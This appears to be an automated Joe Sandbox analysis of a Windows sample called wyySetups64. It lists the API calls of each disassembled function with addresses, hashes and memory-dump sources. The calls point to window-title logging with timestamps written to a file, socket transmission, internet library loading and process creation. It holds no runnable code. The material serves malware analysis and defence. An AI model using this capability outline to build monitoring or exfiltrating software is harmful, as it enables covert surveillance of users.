                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 170005318-2746444292
                                                                                                                                                                                                              • Opcode ID: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                                                                                                                                                              • Instruction ID: eff0eda059bc8f025b9396f7d49d57b0ac837b2ce4ea99a865025b0d16f04fc4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D651E871A4031D7FDB24EBA0CC85FEAB378DF18700F404595A709AA081EBB09799CF66
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337E751
                                                                                                                                                                                                              • GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 0337E759
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,033A16F0,00000800), ref: 0337E76F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337E78D
                                                                                                                                                                                                              • lstrlenW.KERNEL32(033A16F0,?,?,?,?,74DF23A0,00000000), ref: 0337E7AC
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 0337E7BD
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337E804
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0337E815,?,?,?,?,74DF23A0,00000000), ref: 0337E6BD
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: CreateFileW.KERNEL32(033A0D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0337E815,?,?,?,?,74DF23A0,00000000), ref: 0337E6D7
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0337E6F2
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 0337E6FF
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 0337E70A
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: CloseHandle.KERNEL32(00000000), ref: 0337E711
                                                                                                                                                                                                                • Part of subcall function 0337E6B0: ReleaseMutex.KERNEL32(00000000), ref: 0337E71E
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337E820
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                                                                                                                                                                                              • String ID: [
                                                                                                                                                                                                              • API String ID: 2192163267-4056885943
                                                                                                                                                                                                              • Opcode ID: b065f2517eed59f6167d24c851358613aa37d1c9e545c35b76b4f9e2355d1df5
                                                                                                                                                                                                              • Instruction ID: b6cd6c0176328781c7b8cf4732b6565582a762de165f0c4ec3fe7b9d8c360a3a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b065f2517eed59f6167d24c851358613aa37d1c9e545c35b76b4f9e2355d1df5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8821D375E40228FAC760EF549CC6BBA73BCFB04700F048196F984D6190DE745985CBE4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset
                                                                                                                                                                                                              • String ID: !jWW$.$_$i$l${vU_
                                                                                                                                                                                                              • API String ID: 2102423945-3065862289
                                                                                                                                                                                                              • Opcode ID: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                                                                                                                                              • Instruction ID: dcc83845b442f0d0cf68cc4dbb1c894b4d65b2dcb754a6a16bb67e5e0f803ce0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F218870A403689AD720DF50AC80FAABBF5FF86700F0481C9E54CAA651DBB08E84CF52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0337398D,?,00000000,000000FF,00000000), ref: 03373E05
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0337398D,?,00000000,000000FF,00000000), ref: 03373E50
                                                                                                                                                                                                              • send.WS2_32(?,000000FF,00000000,00000000), ref: 03373E6E
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 03373E81
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 03373E94
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,0337398D,?,00000000,000000FF,00000000), ref: 03373EBC
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,0337398D,?,00000000,000000FF,00000000), ref: 03373EC7
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,0337398D,?,00000000,000000FF,00000000), ref: 03373EDB
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 03373F14
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 03373F51
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1701177279-0
                                                                                                                                                                                                              • Opcode ID: dc416325d085837bbf830fee97ab32c6ee8e3ecb252a5ab9181bf7921aa7f304
                                                                                                                                                                                                              • Instruction ID: e875943d1094af6f585a513b2620915abbc656f75447dfed693fe4b18d6b39ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc416325d085837bbf830fee97ab32c6ee8e3ecb252a5ab9181bf7921aa7f304
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F412676504A09DFC764DF78D8C8AA7B7F8AB48310F04896EE8AECB644D735A4419B90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 00BD4F43
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 00BD4F58
                                                                                                                                                                                                              • WSASetLastError.WS2_32(00002746), ref: 00BD4F6A
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 00BD4F71
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BD4F9F
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BD4FC7
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00BD5005
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 00BD5011
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 00BD5018
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 00BD502B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1979691958-0
                                                                                                                                                                                                              • Opcode ID: 4ce3595aa8134a96b3af01adccce2ed87a73d6450ec4708a70cdba38e020d0d3
                                                                                                                                                                                                              • Instruction ID: 2ef4256d4e7d0ebbbad83778270fb4461bcf85bac4693b24ce6b26620b1eda4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ce3595aa8134a96b3af01adccce2ed87a73d6450ec4708a70cdba38e020d0d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A141C0316006449FD730DF68D988A6AF7E9FF58314F04459AE54ECB762FB75E8408B81
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 03374F63
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 03374F78
                                                                                                                                                                                                              • WSASetLastError.WS2_32(00002746), ref: 03374F8A
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 03374F91
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 03374FBF
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 03374FE7
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 03375025
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 03375031
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 03375038
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 0337504B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1979691958-0
                                                                                                                                                                                                              • Opcode ID: 8d376dd4ca137aefc5b51cc99bf6e127ab1c812fbc4ad5d1fbe5a65e8c185e2c
                                                                                                                                                                                                              • Instruction ID: 0f7010074fbf8dfbc7d0eade4c139975f2b0e7b9b0fb541e094688648083a52b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d376dd4ca137aefc5b51cc99bf6e127ab1c812fbc4ad5d1fbe5a65e8c185e2c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D741D831600704DFD730EF65D9C4A6AB7EDFB49714F084A9AE44AC7641E33AF4458B41
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337C2AE
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0337C2CC
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0337C309
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0337C314
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0337C321
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337C345
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                                                                                                                                                                                              • String ID: %s %s
                                                                                                                                                                                                              • API String ID: 1326869720-2939940506
                                                                                                                                                                                                              • Opcode ID: 7a802ce9a605028fccef6b8fb680433577e8bf8ebc22e8c36595236ccae6b36e
                                                                                                                                                                                                              • Instruction ID: 1f7ab64c71531663740b4429fb6087eb798196d59376351274e35a7c762d18bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a802ce9a605028fccef6b8fb680433577e8bf8ebc22e8c36595236ccae6b36e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5317232A40618ABEB24EB64DCC5FEF736CFB45311F40069AF605EA180DA395A44CFA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0337C98D
                                                                                                                                                                                                              • _wcsrchr.LIBCMT ref: 0337C9C7
                                                                                                                                                                                                                • Part of subcall function 03377C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 03377CC3
                                                                                                                                                                                                                • Part of subcall function 03377C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03377CD7
                                                                                                                                                                                                                • Part of subcall function 03377C80: FreeLibrary.KERNEL32(00000000), ref: 03377CF7
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(-00000002), ref: 0337C9E6
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0337C9F1
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337CA04
                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0337CA31
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                                                                                                                                                                                              • String ID: D$WinSta0\Default
                                                                                                                                                                                                              • API String ID: 174883095-1101385590
                                                                                                                                                                                                              • Opcode ID: 3f393a63fa9d11909f8a2cbc615f5c55e5e9b673cdb65712fb486f6efdeb8d27
                                                                                                                                                                                                              • Instruction ID: 923f2c1a8c56d2976c5150c7cc3b22f80e675051fc8a3e00f86f301aea57205e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f393a63fa9d11909f8a2cbc615f5c55e5e9b673cdb65712fb486f6efdeb8d27
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD11D5B6D0020877D734E7A89CC6FEFB76D9B55711F040126FA06DA284E63A9905C6A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,A:\), ref: 03378166
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,B:\), ref: 03378176
                                                                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 033781A6
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 033781B7
                                                                                                                                                                                                              • __wcsnicmp.LIBCMT ref: 033781CE
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(00000AD4,?), ref: 03378204
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 03378228
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00000000), ref: 03378233
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                                                                                                                                                                                              • String ID: A:\$B:\
                                                                                                                                                                                                              • API String ID: 4249875308-1009255891
                                                                                                                                                                                                              • Opcode ID: 0faeaf21af258c9a15a3dcfc88a942bf374341b3f8fbd88bc376c1751dc9800a
                                                                                                                                                                                                              • Instruction ID: 94c423bdb2305fb01596cfd232a2910bf6ff4f4276edc1efc23967403b8dc253
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0faeaf21af258c9a15a3dcfc88a942bf374341b3f8fbd88bc376c1751dc9800a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49114F71A01218EBDB24EF51DD85BEEB378EF44310F044499EA09B7240E775DA45CBA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,7AA29978,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E,00000000), ref: 03379773
                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0337E1AE,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 03379812
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 03379850
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 03379875
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 0337989A
                                                                                                                                                                                                                • Part of subcall function 03371280: __CxxThrowException@8.LIBCMT ref: 03371290
                                                                                                                                                                                                                • Part of subcall function 03371280: DeleteCriticalSection.KERNEL32(00000000,0337D3E6,03396624,?,?,0337D3E6,?,?,?,?,03395A40,00000000), ref: 033712A1
                                                                                                                                                                                                                • Part of subcall function 0337CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0337E076,00000000,7AA29978,0337E04E,74DF2F60,00000000,?,0337E226,0339110B,000000FF,?,0337994A,0337E226), ref: 0337CE67
                                                                                                                                                                                                                • Part of subcall function 0337CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0337E08E,00000000,?,0337E226,0339110B,000000FF,?,0337994A,0337E226,?,?,?,00000000,0339125B,000000FF), ref: 0337CE83
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(0337E066,00000000), ref: 033799A0
                                                                                                                                                                                                              • timeGetTime.WINMM(?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 033799A6
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 033799B4
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 033799BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1400036169-0
                                                                                                                                                                                                              • Opcode ID: 55519ae1cdf5fa4a6433cc6418badec36d25fbedb34c0d5469ab782b0280e486
                                                                                                                                                                                                              • Instruction ID: 6b4ed3ad6a99e98baf515c66c9569f9c3fbcfe64f46b35ac58e3346d85cfa7f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55519ae1cdf5fa4a6433cc6418badec36d25fbedb34c0d5469ab782b0280e486
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A981C5B1A01A46BFE354DF6A88C4796FAA8FB08304F50422ED12CD7640D775A964CF90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD3660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00BD3667
                                                                                                                                                                                                                • Part of subcall function 00BD3660: _free.LIBCMT ref: 00BD369C
                                                                                                                                                                                                                • Part of subcall function 00BD3660: _malloc.LIBCMT ref: 00BD36D7
                                                                                                                                                                                                                • Part of subcall function 00BD3660: _memset.LIBCMT ref: 00BD36E5
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00BED990), ref: 00BD3565
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00BED990), ref: 00BD3573
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00BD359A
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 00BD35B3
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,00BED990), ref: 00BD35EE
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00BD3621
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BD3639
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: GetCurrentThreadId.KERNEL32 ref: 00BD3F65
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: send.WS2_32(?,00BE7440,00000010,00000000), ref: 00BD3FC6
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: SetEvent.KERNEL32(?), ref: 00BD3FE9
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 00BD3FF5
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: WSACloseEvent.WS2_32(?), ref: 00BD4003
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: shutdown.WS2_32(?,00000001), ref: 00BD401B
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: closesocket.WS2_32(?), ref: 00BD4025
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00BD3649
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 127459856-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03373660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03373667
                                                                                                                                                                                                                • Part of subcall function 03373660: _free.LIBCMT ref: 0337369C
                                                                                                                                                                                                                • Part of subcall function 03373660: _malloc.LIBCMT ref: 033736D7
                                                                                                                                                                                                                • Part of subcall function 03373660: _memset.LIBCMT ref: 033736E5
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(033A1F0C), ref: 03373565
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(033A1F0C), ref: 03373573
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0337359A
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 033735B3
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,033A1F0C), ref: 033735EE
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 03373621
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 03373639
                                                                                                                                                                                                                • Part of subcall function 03373F60: GetCurrentThreadId.KERNEL32 ref: 03373F65
                                                                                                                                                                                                                • Part of subcall function 03373F60: send.WS2_32(?,033949C0,00000010,00000000), ref: 03373FC6
                                                                                                                                                                                                                • Part of subcall function 03373F60: SetEvent.KERNEL32(?), ref: 03373FE9
                                                                                                                                                                                                                • Part of subcall function 03373F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03373FF5
                                                                                                                                                                                                                • Part of subcall function 03373F60: WSACloseEvent.WS2_32(?), ref: 03374003
                                                                                                                                                                                                                • Part of subcall function 03373F60: shutdown.WS2_32(?,00000001), ref: 0337401B
                                                                                                                                                                                                                • Part of subcall function 03373F60: closesocket.WS2_32(?), ref: 03374025
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 03373649
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 127459856-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00BD4443
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00BD444C
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BD444E
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00BD445D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00001770), ref: 00BD44AB
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00BD44C8
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: GetCurrentThreadId.KERNEL32 ref: 00BD3F65
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: send.WS2_32(?,00BE7440,00000010,00000000), ref: 00BD3FC6
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: SetEvent.KERNEL32(?), ref: 00BD3FE9
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 00BD3FF5
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: WSACloseEvent.WS2_32(?), ref: 00BD4003
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: shutdown.WS2_32(?,00000001), ref: 00BD401B
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: closesocket.WS2_32(?), ref: 00BD4025
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00BD44DC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
